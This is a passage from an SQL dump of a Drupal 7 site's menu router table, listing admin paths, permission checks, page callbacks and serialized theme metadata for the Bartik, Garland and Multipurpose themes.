blocks\";}','dashboard_update','a:0:{}','',7,3,0,'','admin/dashboard/update','','t','','','a:0:{}',0,'','',0,''),('admin/help','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_main','a:0:{}','',3,2,0,'','admin/help','Help','t','','','a:0:{}',6,'Reference for usage, configuration, and modules.','',9,'modules/help/help.admin.inc'),('admin/help/adsense','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/adsense','adsense','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/block','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/block','block','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/blog','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/blog','blog','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/color','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/color','color','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/comment','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/comment','comment','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/contact','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/contact','contact','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/contextual','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/contextual','contextual','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/dashboard','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/dashboard','dashboard','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/dblog','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/dblog','dblog','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/field','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/field','field','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/field_sql_storage','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/field_sql_storage','field_sql_storage','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/field_ui','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/field_ui','field_ui','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/file','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/file','file','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/filter','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/filter','filter','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/help','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/help','help','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/image','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/image','image','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/list','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/list','list','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/menu','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/menu','menu','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/node','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/node','node','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/number','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/number','number','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/options','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/options','options','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/overlay','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/overlay','overlay','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/path','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/path','path','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/php','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/php','php','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/rdf','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/rdf','rdf','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/search','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/search','search','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/shortcut','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/shortcut','shortcut','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/statistics','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/statistics','statistics','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/system','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/system','system','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/taxonomy','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/taxonomy','taxonomy','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/text','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/text','text','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/toolbar','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/toolbar','toolbar','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/update','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/update','update','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/help/user','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','help_page','a:1:{i:0;i:2;}','',7,3,0,'','admin/help/user','user','t','','','a:0:{}',4,'','',0,'modules/help/help.admin.inc'),('admin/index','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','system_admin_index','a:0:{}','',3,2,1,'admin','admin','Index','t','','','a:0:{}',132,'','',-18,'modules/system/system.admin.inc'),('admin/modules','','','user_access','a:1:{i:0;s:18:\"administer modules\";}','drupal_get_form','a:1:{i:0;s:14:\"system_modules\";}','',3,2,0,'','admin/modules','Modules','t','','','a:0:{}',6,'Extend site functionality.','',-2,'modules/system/system.admin.inc'),('admin/modules/install','','','update_manager_access','a:0:{}','drupal_get_form','a:2:{i:0;s:27:\"update_manager_install_form\";i:1;s:6:\"module\";}','',7,3,1,'admin/modules','admin/modules','Install new module','t','','','a:0:{}',388,'','',25,'modules/update/update.manager.inc'),('admin/modules/list','','','user_access','a:1:{i:0;s:18:\"administer modules\";}','drupal_get_form','a:1:{i:0;s:14:\"system_modules\";}','',7,3,1,'admin/modules','admin/modules','List','t','','','a:0:{}',140,'','',0,'modules/system/system.admin.inc'),('admin/modules/list/confirm','','','user_access','a:1:{i:0;s:18:\"administer modules\";}','drupal_get_form','a:1:{i:0;s:14:\"system_modules\";}','',15,4,0,'','admin/modules/list/confirm','List','t','','','a:0:{}',4,'','',0,'modules/system/system.admin.inc'),('admin/modules/uninstall','','','user_access','a:1:{i:0;s:18:\"administer modules\";}','drupal_get_form','a:1:{i:0;s:24:\"system_modules_uninstall\";}','',7,3,1,'admin/modules','admin/modules','Uninstall','t','','','a:0:{}',132,'','',20,'modules/system/system.admin.inc'),('admin/modules/uninstall/confirm','','','user_access','a:1:{i:0;s:18:\"administer modules\";}','drupal_get_form','a:1:{i:0;s:24:\"system_modules_uninstall\";}','',15,4,0,'','admin/modules/uninstall/confirm','Uninstall','t','','','a:0:{}',4,'','',0,'modules/system/system.admin.inc'),('admin/modules/update','','','update_manager_access','a:0:{}','drupal_get_form','a:2:{i:0;s:26:\"update_manager_update_form\";i:1;s:6:\"module\";}','',7,3,1,'admin/modules','admin/modules','Update','t','','','a:0:{}',132,'','',10,'modules/update/update.manager.inc'),('admin/people','','','user_access','a:1:{i:0;s:16:\"administer users\";}','user_admin','a:1:{i:0;s:4:\"list\";}','',3,2,0,'','admin/people','People','t','','','a:0:{}',6,'Manage user accounts, roles, and permissions.','left',-4,'modules/user/user.admin.inc'),('admin/people/create','','','user_access','a:1:{i:0;s:16:\"administer users\";}','user_admin','a:1:{i:0;s:6:\"create\";}','',7,3,1,'admin/people','admin/people','Add user','t','','','a:0:{}',388,'','',0,'modules/user/user.admin.inc'),('admin/people/people','','','user_access','a:1:{i:0;s:16:\"administer users\";}','user_admin','a:1:{i:0;s:4:\"list\";}','',7,3,1,'admin/people','admin/people','List','t','','','a:0:{}',140,'Find and manage people interacting with your site.','',-10,'modules/user/user.admin.inc'),('admin/people/permissions','','','user_access','a:1:{i:0;s:22:\"administer permissions\";}','drupal_get_form','a:1:{i:0;s:22:\"user_admin_permissions\";}','',7,3,1,'admin/people','admin/people','Permissions','t','','','a:0:{}',132,'Determine access to features by selecting permissions for roles.','',0,'modules/user/user.admin.inc'),('admin/people/permissions/list','','','user_access','a:1:{i:0;s:22:\"administer permissions\";}','drupal_get_form','a:1:{i:0;s:22:\"user_admin_permissions\";}','',15,4,1,'admin/people/permissions','admin/people','Permissions','t','','','a:0:{}',140,'Determine access to features by selecting permissions for roles.','',-8,'modules/user/user.admin.inc'),('admin/people/permissions/roles','','','user_access','a:1:{i:0;s:22:\"administer permissions\";}','drupal_get_form','a:1:{i:0;s:16:\"user_admin_roles\";}','',15,4,1,'admin/people/permissions','admin/people','Roles','t','','','a:0:{}',132,'List, edit, or add user roles.','',-5,'modules/user/user.admin.inc'),('admin/people/permissions/roles/delete/%','a:1:{i:5;s:14:\"user_role_load\";}','','user_role_edit_access','a:1:{i:0;i:5;}','drupal_get_form','a:2:{i:0;s:30:\"user_admin_role_delete_confirm\";i:1;i:5;}','',62,6,0,'','admin/people/permissions/roles/delete/%','Delete role','t','','','a:0:{}',6,'','',0,'modules/user/user.admin.inc'),('admin/people/permissions/roles/edit/%','a:1:{i:5;s:14:\"user_role_load\";}','','user_role_edit_access','a:1:{i:0;i:5;}','drupal_get_form','a:2:{i:0;s:15:\"user_admin_role\";i:1;i:5;}','',62,6,0,'','admin/people/permissions/roles/edit/%','Edit role','t','','','a:0:{}',6,'','',0,'modules/user/user.admin.inc'),('admin/reports','','','user_access','a:1:{i:0;s:19:\"access site reports\";}','system_admin_menu_block_page','a:0:{}','',3,2,0,'','admin/reports','Reports','t','','','a:0:{}',6,'View reports, updates, and errors.','left',5,'modules/system/system.admin.inc'),('admin/reports/access-denied','','','user_access','a:1:{i:0;s:19:\"access site reports\";}','dblog_top','a:1:{i:0;s:13:\"access denied\";}','',7,3,0,'','admin/reports/access-denied','Top \'access denied\' errors','t','','','a:0:{}',6,'View \'access denied\' errors (403s).','',0,'modules/dblog/dblog.admin.inc'),('admin/reports/access/%','a:1:{i:3;N;}','','user_access','a:1:{i:0;s:17:\"access statistics\";}','statistics_access_log','a:1:{i:0;i:3;}','',14,4,0,'','admin/reports/access/%','Details','t','','','a:0:{}',6,'View access log.','',0,'modules/statistics/statistics.admin.inc'),('admin/reports/adsense','','','user_access','a:1:{i:0;s:11:\"view clicks\";}','adsense_click_log','a:0:{}','',7,3,0,'','admin/reports/adsense','AdSense clicks','t','','','a:0:{}',6,'Track AdSense clicks.','',0,'sites/all/modules/adsense/contrib/adsense_click/adsense_click.logs.inc'),('admin/reports/adsense/by_day','','','user_access','a:1:{i:0;s:11:\"view clicks\";}','adsense_click_by_day','a:0:{}','',15,4,0,'','admin/reports/adsense/by_day','By day','t','','','a:0:{}',6,'','',0,'sites/all/modules/adsense/contrib/adsense_click/adsense_click.logs.inc'),('admin/reports/adsense/top_pages','','','user_access','a:1:{i:0;s:11:\"view clicks\";}','adsense_click_top_pages','a:0:{}','',15,4,0,'','admin/reports/adsense/top_pages','Top pages','t','','','a:0:{}',6,'','',0,'sites/all/modules/adsense/contrib/adsense_click/adsense_click.logs.inc'),('admin/reports/dblog','','','user_access','a:1:{i:0;s:19:\"access site reports\";}','dblog_overview','a:0:{}','',7,3,0,'','admin/reports/dblog','Recent log messages','t','','','a:0:{}',6,'View events that have recently been logged.','',-1,'modules/dblog/dblog.admin.inc'),('admin/reports/event/%','a:1:{i:3;N;}','','user_access','a:1:{i:0;s:19:\"access site reports\";}','dblog_event','a:1:{i:0;i:3;}','',14,4,0,'','admin/reports/event/%','Details','t','','','a:0:{}',6,'','',0,'modules/dblog/dblog.admin.inc'),('admin/reports/fields','','','user_access','a:1:{i:0;s:24:\"administer content types\";}','field_ui_fields_list','a:0:{}','',7,3,0,'','admin/reports/fields','Field list','t','','','a:0:{}',6,'Overview of fields on all entity types.','',0,'modules/field_ui/field_ui.admin.inc'),('admin/reports/hits','','','user_access','a:1:{i:0;s:17:\"access statistics\";}','statistics_recent_hits','a:0:{}','',7,3,0,'','admin/reports/hits','Recent hits','t','','','a:0:{}',6,'View pages that have recently been visited.','',0,'modules/statistics/statistics.admin.inc'),('admin/reports/page-not-found','','','user_access','a:1:{i:0;s:19:\"access site reports\";}','dblog_top','a:1:{i:0;s:14:\"page not found\";}','',7,3,0,'','admin/reports/page-not-found','Top \'page not found\' errors','t','','','a:0:{}',6,'View \'page not found\' errors (404s).','',0,'modules/dblog/dblog.admin.inc'),('admin/reports/pages','','','user_access','a:1:{i:0;s:17:\"access statistics\";}','statistics_top_pages','a:0:{}','',7,3,0,'','admin/reports/pages','Top pages','t','','','a:0:{}',6,'View pages that have been hit frequently.','',1,'modules/statistics/statistics.admin.inc'),('admin/reports/referrers','','','user_access','a:1:{i:0;s:17:\"access statistics\";}','statistics_top_referrers','a:0:{}','',7,3,0,'','admin/reports/referrers','Top referrers','t','','','a:0:{}',6,'View top referrers.','',0,'modules/statistics/statistics.admin.inc'),('admin/reports/search','','','user_access','a:1:{i:0;s:19:\"access site reports\";}','dblog_top','a:1:{i:0;s:6:\"search\";}','',7,3,0,'','admin/reports/search','Top search phrases','t','','','a:0:{}',6,'View most popular search phrases.','',0,'modules/dblog/dblog.admin.inc'),('admin/reports/status','','','user_access','a:1:{i:0;s:29:\"administer site configuration\";}','system_status','a:0:{}','',7,3,0,'','admin/reports/status','Status report','t','','','a:0:{}',6,'Get a status report about your site\'s operation and any detected problems.','',-60,'modules/system/system.admin.inc'),('admin/reports/status/php','','','user_access','a:1:{i:0;s:29:\"administer site configuration\";}','system_php','a:0:{}','',15,4,0,'','admin/reports/status/php','PHP','t','','','a:0:{}',0,'','',0,'modules/system/system.admin.inc'),('admin/reports/status/rebuild','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','drupal_get_form','a:1:{i:0;s:30:\"node_configure_rebuild_confirm\";}','',15,4,0,'','admin/reports/status/rebuild','Rebuild permissions','t','','','a:0:{}',0,'','',0,'modules/node/node.admin.inc'),('admin/reports/status/run-cron','','','user_access','a:1:{i:0;s:29:\"administer site configuration\";}','system_run_cron','a:0:{}','',15,4,0,'','admin/reports/status/run-cron','Run cron','t','','','a:0:{}',0,'','',0,'modules/system/system.admin.inc'),('admin/reports/updates','','','user_access','a:1:{i:0;s:29:\"administer site configuration\";}','update_status','a:0:{}','',7,3,0,'','admin/reports/updates','Available updates','t','','','a:0:{}',6,'Get a status report about available updates for your installed modules and themes.','',-50,'modules/update/update.report.inc'),('admin/reports/updates/check','','','user_access','a:1:{i:0;s:29:\"administer site configuration\";}','update_manual_status','a:0:{}','',15,4,0,'','admin/reports/updates/check','Manual update check','t','','','a:0:{}',0,'','',0,'modules/update/update.fetch.inc'),('admin/reports/updates/install','','','update_manager_access','a:0:{}','drupal_get_form','a:2:{i:0;s:27:\"update_manager_install_form\";i:1;s:6:\"report\";}','',15,4,1,'admin/reports/updates','admin/reports/updates','Install new module or theme','t','','','a:0:{}',388,'','',25,'modules/update/update.manager.inc'),('admin/reports/updates/list','','','user_access','a:1:{i:0;s:29:\"administer site configuration\";}','update_status','a:0:{}','',15,4,1,'admin/reports/updates','admin/reports/updates','List','t','','','a:0:{}',140,'','',0,'modules/update/update.report.inc'),('admin/reports/updates/settings','','','user_access','a:1:{i:0;s:29:\"administer site configuration\";}','drupal_get_form','a:1:{i:0;s:15:\"update_settings\";}','',15,4,1,'admin/reports/updates','admin/reports/updates','Settings','t','','','a:0:{}',132,'','',50,'modules/update/update.settings.inc'),('admin/reports/updates/update','','','update_manager_access','a:0:{}','drupal_get_form','a:2:{i:0;s:26:\"update_manager_update_form\";i:1;s:6:\"report\";}','',15,4,1,'admin/reports/updates','admin/reports/updates','Update','t','','','a:0:{}',132,'','',10,'modules/update/update.manager.inc'),('admin/reports/visitors','','','user_access','a:1:{i:0;s:17:\"access statistics\";}','statistics_top_visitors','a:0:{}','',7,3,0,'','admin/reports/visitors','Top visitors','t','','','a:0:{}',6,'View visitors that hit many pages.','',2,'modules/statistics/statistics.admin.inc'),('admin/structure','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','system_admin_menu_block_page','a:0:{}','',3,2,0,'','admin/structure','Structure','t','','','a:0:{}',6,'Administer blocks, content types, menus, etc.','right',-8,'modules/system/system.admin.inc'),('admin/structure/block','','','user_access','a:1:{i:0;s:17:\"administer blocks\";}','block_admin_display','a:1:{i:0;s:17:\"responsive_bartik\";}','',7,3,0,'','admin/structure/block','Blocks','t','','','a:0:{}',6,'Configure what block content appears in your site\'s sidebars and other regions.','',0,'modules/block/block.admin.inc'),('admin/structure/block/add','','','user_access','a:1:{i:0;s:17:\"administer blocks\";}','drupal_get_form','a:1:{i:0;s:20:\"block_add_block_form\";}','',15,4,1,'admin/structure/block','admin/structure/block','Add block','t','','','a:0:{}',388,'','',0,'modules/block/block.admin.inc'),('admin/structure/block/demo/bartik','','','_block_themes_access','a:1:{i:0;O:8:\"stdClass\":12:{s:8:\"filename\";s:25:\"themes/bartik/bartik.info\";s:4:\"name\";s:6:\"bartik\";s:4:\"type\";s:5:\"theme\";s:5:\"owner\";s:45:\"themes/engines/phptemplate/phptemplate.engine\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:2:\"-1\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:19:{s:4:\"name\";s:6:\"Bartik\";s:11:\"description\";s:48:\"A flexible, recolorable theme with many regions.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.40\";s:4:\"core\";s:3:\"7.x\";s:11:\"stylesheets\";a:2:{s:3:\"all\";a:3:{s:14:\"css/layout.css\";s:28:\"themes/bartik/css/layout.css\";s:13:\"css/style.css\";s:27:\"themes/bartik/css/style.css\";s:14:\"css/colors.css\";s:28:\"themes/bartik/css/colors.css\";}s:5:\"print\";a:1:{s:13:\"css/print.css\";s:27:\"themes/bartik/css/print.css\";}}s:7:\"regions\";a:20:{s:6:\"header\";s:6:\"Header\";s:4:\"help\";s:4:\"Help\";s:8:\"page_top\";s:8:\"Page top\";s:11:\"page_bottom\";s:11:\"Page bottom\";s:11:\"highlighted\";s:11:\"Highlighted\";s:8:\"featured\";s:8:\"Featured\";s:7:\"content\";s:7:\"Content\";s:13:\"sidebar_first\";s:13:\"Sidebar first\";s:14:\"sidebar_second\";s:14:\"Sidebar second\";s:14:\"triptych_first\";s:14:\"Triptych first\";s:15:\"triptych_middle\";s:15:\"Triptych middle\";s:13:\"triptych_last\";s:13:\"Triptych last\";s:18:\"footer_firstcolumn\";s:19:\"Footer first column\";s:19:\"footer_secondcolumn\";s:20:\"Footer second column\";s:18:\"footer_thirdcolumn\";s:19:\"Footer third column\";s:19:\"footer_fourthcolumn\";s:20:\"Footer fourth column\";s:6:\"footer\";s:6:\"Footer\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:8:\"settings\";a:1:{s:20:\"shortcut_module_link\";s:1:\"0\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1444866674\";s:6:\"engine\";s:11:\"phptemplate\";s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:7:\"favicon\";i:2;s:4:\"name\";i:3;s:6:\"slogan\";i:4;s:17:\"node_user_picture\";i:5;s:20:\"comment_user_picture\";i:6;s:25:\"comment_user_verification\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:10:\"screenshot\";s:28:\"themes/bartik/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:7:\"scripts\";a:0:{}s:5:\"mtime\";i:1444866674;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:14:\"regions_hidden\";a:2:{i:0;s:8:\"page_top\";i:1;s:11:\"page_bottom\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}s:6:\"prefix\";s:11:\"phptemplate\";s:11:\"stylesheets\";a:2:{s:3:\"all\";a:3:{s:14:\"css/layout.css\";s:28:\"themes/bartik/css/layout.css\";s:13:\"css/style.css\";s:27:\"themes/bartik/css/style.css\";s:14:\"css/colors.css\";s:28:\"themes/bartik/css/colors.css\";}s:5:\"print\";a:1:{s:13:\"css/print.css\";s:27:\"themes/bartik/css/print.css\";}}s:6:\"engine\";s:11:\"phptemplate\";}}','block_admin_demo','a:1:{i:0;s:6:\"bartik\";}','',31,5,0,'','admin/structure/block/demo/bartik','Bartik','t','','_block_custom_theme','a:1:{i:0;s:6:\"bartik\";}',0,'','',0,'modules/block/block.admin.inc'),('admin/structure/block/demo/garland','','','_block_themes_access','a:1:{i:0;O:8:\"stdClass\":12:{s:8:\"filename\";s:27:\"themes/garland/garland.info\";s:4:\"name\";s:7:\"garland\";s:4:\"type\";s:5:\"theme\";s:5:\"owner\";s:45:\"themes/engines/phptemplate/phptemplate.engine\";s:6:\"status\";s:1:\"0\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:2:\"-1\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:19:{s:4:\"name\";s:7:\"Garland\";s:11:\"description\";s:111:\"A multi-column theme which can be configured to modify colors and switch between fixed and fluid width layouts.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.40\";s:4:\"core\";s:3:\"7.x\";s:11:\"stylesheets\";a:2:{s:3:\"all\";a:1:{s:9:\"style.css\";s:24:\"themes/garland/style.css\";}s:5:\"print\";a:1:{s:9:\"print.css\";s:24:\"themes/garland/print.css\";}}s:8:\"settings\";a:1:{s:13:\"garland_width\";s:5:\"fluid\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1444866674\";s:6:\"engine\";s:11:\"phptemplate\";s:7:\"regions\";a:12:{s:13:\"sidebar_first\";s:12:\"Left sidebar\";s:14:\"sidebar_second\";s:13:\"Right sidebar\";s:7:\"content\";s:7:\"Content\";s:6:\"header\";s:6:\"Header\";s:6:\"footer\";s:6:\"Footer\";s:11:\"highlighted\";s:11:\"Highlighted\";s:4:\"help\";s:4:\"Help\";s:8:\"page_top\";s:8:\"Page top\";s:11:\"page_bottom\";s:11:\"Page bottom\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:7:\"favicon\";i:2;s:4:\"name\";i:3;s:6:\"slogan\";i:4;s:17:\"node_user_picture\";i:5;s:20:\"comment_user_picture\";i:6;s:25:\"comment_user_verification\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:10:\"screenshot\";s:29:\"themes/garland/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:7:\"scripts\";a:0:{}s:5:\"mtime\";i:1444866674;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:14:\"regions_hidden\";a:2:{i:0;s:8:\"page_top\";i:1;s:11:\"page_bottom\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}s:6:\"prefix\";s:11:\"phptemplate\";s:11:\"stylesheets\";a:2:{s:3:\"all\";a:1:{s:9:\"style.css\";s:24:\"themes/garland/style.css\";}s:5:\"print\";a:1:{s:9:\"print.css\";s:24:\"themes/garland/print.css\";}}s:6:\"engine\";s:11:\"phptemplate\";}}','block_admin_demo','a:1:{i:0;s:7:\"garland\";}','',31,5,0,'','admin/structure/block/demo/garland','Garland','t','','_block_custom_theme','a:1:{i:0;s:7:\"garland\";}',0,'','',0,'modules/block/block.admin.inc'),('admin/structure/block/demo/multipurpose','','','_block_themes_access','a:1:{i:0;O:8:\"stdClass\":13:{s:8:\"filename\";s:47:\"sites/all/themes/multipurpose/multipurpose.info\";s:4:\"name\";s:12:\"multipurpose\";s:4:\"type\";s:5:\"theme\";s:5:\"owner\";s:45:\"themes/engines/phptemplate/phptemplate.engine\";s:6:\"status\";s:1:\"0\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:2:\"-1\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:18:{s:4:\"name\";s:18:\"Multipurpose Theme\";s:11:\"description\";s:112:\"Multipurpose Theme is a premium Drupal 7 theme. Developed by Devsaran.com.\";s:4:\"core\";s:3:\"7.x\";s:6:\"engine\";s:11:\"phptemplate\";s:11:\"stylesheets\";a:1:{s:3:\"all\";a:2:{s:9:\"style.css\";s:39:\"sites/all/themes/multipurpose/style.css\";s:18:\"css/responsive.css\";s:48:\"sites/all/themes/multipurpose/css/responsive.css\";}}s:7:\"scripts\";a:3:{s:12:\"js/retina.js\";s:42:\"sites/all/themes/multipurpose/js/retina.js\";s:13:\"js/plugins.js\";s:43:\"sites/all/themes/multipurpose/js/plugins.js\";s:12:\"js/global.js\";s:42:\"sites/all/themes/multipurpose/js/global.js\";}s:7:\"regions\";a:15:{s:13:\"sidebar_first\";s:13:\"First Sidebar\";s:6:\"header\";s:6:\"Header\";s:13:\"preface_first\";s:13:\"Preface First\";s:14:\"preface_middle\";s:14:\"Preface Middle\";s:12:\"preface_last\";s:12:\"Preface Last\";s:11:\"content_top\";s:11:\"Content Top\";s:7:\"content\";s:7:\"Content\";s:4:\"help\";s:4:\"Help\";s:6:\"footer\";s:6:\"Footer\";s:12:\"footer_first\";s:12:\"First Bottom\";s:13:\"footer_second\";s:13:\"Second Bottom\";s:12:\"footer_third\";s:12:\"Third Bottom\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard 